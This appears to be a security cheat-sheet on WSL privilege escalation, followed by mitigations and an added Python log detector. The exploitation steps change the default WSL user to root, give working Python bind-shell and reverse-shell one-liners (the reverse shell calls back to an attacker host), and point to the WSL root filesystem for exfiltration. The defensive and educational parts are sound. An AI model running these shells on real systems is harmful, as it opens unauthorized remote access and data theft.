EoP - Windows Subsystem for Linux (WSL)

Key Exploitation Points

  1. Default User Configuration: WSL allows setting the default user to root, granting administrative privileges inside the Linux distribution.

  2. Network Access: Root access enables opening any port, facilitating bind or reverse shells.

  3. Filesystem Access: WSL’s filesystem integration allows exploration and potential data exfiltration.


Step-by-Step Exploitation Guide

1. Verifying WSL Installation

Confirm WSL is installed and configured:

wsl --list --verbose

This lists the installed distributions with their state and WSL version.


2. Changing the Default User to Root

Gain root privileges by changing the default user:

C:\path\to\your\distribution.exe config --default-user root

Example for Ubuntu:

C:\Ubuntu.exe config --default-user root

3. Verifying Root Access

After setting the default user to root, confirm by running:

wsl whoami

Expected output: root


4. Establishing a Bind or Reverse Shell

Once you have root access, use Python to establish a shell:

Bind Shell

Opens a port for incoming connections:

wsl python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.bind(("0.0.0.0", PORT));s.listen(1);c,a=s.accept();os.dup2(c.fileno(),0);os.dup2(c.fileno(),1);os.dup2(c.fileno(),2);pty.spawn("/bin/bash")'

Replace PORT with the desired listening port.


Reverse Shell

Connects back to an external listener:

wsl python -c 'import socket,os,pty;s=socket.socket();s.connect(("YOUR_IP", YOUR_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Replace YOUR_IP and YOUR_PORT with the attacker's IP and port.


5. Accessing the WSL Filesystem

The WSL filesystem can be explored directly from Windows. For the Ubuntu Store package, it is located at:

C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\

This location contains the root filesystem of the WSL environment.


6. Alternative Access via bash.exe

Access WSL through bash.exe:

C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe

Run bash.exe to enter the WSL environment directly.


Mitigation Strategies

To secure systems against unauthorized WSL exploitation:

1. Limit WSL Use

Restrict access to WSL, especially for non-administrative users on sensitive systems.


2. Configure User Permissions

Ensure the default user cannot be set to root without administrative approval.


3. Network Security

Monitor and restrict ports opened by WSL to prevent unauthorized bind or reverse shells.


4. Audit WSL Activity

Regularly review WSL configurations and logs for signs of unauthorized changes or suspicious activity.


5. Keep Systems Updated

Ensure both Windows and WSL are up-to-date with the latest security patches.
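
For the "Audit WSL Activity" step, the following added example (not part of the original page) scans process-creation records for the three command patterns shown earlier: the default-user change to root, a Python socket shell launched through wsl, and bash.exe run from WinSxS. The field names (User, Image, CommandLine), the rule names, and the sample events are assumptions constructed for illustration; the WinSxS directory suffix is a placeholder.

```python
import re
from collections import defaultdict

# Patterns derived from the commands shown on this page.
RULES = {
    "default_user_root": re.compile(r"\bconfig\s+--default-user\s+root\b", re.I),
    "python_socket_shell": re.compile(
        r"\b(?:wsl|bash)(?:\.exe)?\b.*\bpython[\d.]*\s+-c\b"
        r"(?=.*\bsocket\b)(?=.*\b(?:pty\.spawn|os\.dup2)\b)", re.I),
    "bash_from_winsxs": re.compile(r"\\WinSxS\\[^\\]*lxssbash[^\\]*\\bash\.exe", re.I),
}

# Constructed sample events; field names assume Sysmon-style process-creation records.
SAMPLE_EVENTS = [
    {"User": "LAB\\alice", "Image": r"C:\Ubuntu.exe",
     "CommandLine": r"C:\Ubuntu.exe config --default-user root"},
    {"User": "LAB\\alice", "Image": r"C:\Windows\System32\wsl.exe",
     "CommandLine": "wsl python -c 'import socket,os,pty; ...; "
                    "pty.spawn(\"/bin/bash\")'"},
    {"User": "LAB\\bob",
     "Image": r"C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_PLACEHOLDER\bash.exe",
     "CommandLine": "bash.exe"},
    {"User": "LAB\\carol", "Image": r"C:\Windows\System32\wsl.exe",
     "CommandLine": "wsl python -c 'print(1)'"},  # benign: no socket use
]

def triage(events):
    """Return {user: {"rules": [...], "severity": str}} for users with rule hits."""
    hits = defaultdict(set)
    for ev in events:
        text = f'{ev["Image"]} {ev["CommandLine"]}'
        for name, rx in RULES.items():
            if rx.search(text):
                hits[ev["User"]].add(name)
    report = {}
    for user, names in hits.items():
        # Root default user plus a socket-backed shell is the full chain from this page.
        chained = {"default_user_root", "python_socket_shell"} <= names
        report[user] = {"rules": sorted(names),
                        "severity": "high" if chained else "medium"}
    return report

if __name__ == "__main__":
    for user, info in triage(SAMPLE_EVENTS).items():
        print(user, info["severity"], ", ".join(info["rules"]))
```

The same patterns can be applied to any log source that records full command lines, provided command-line auditing is enabled on the host.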

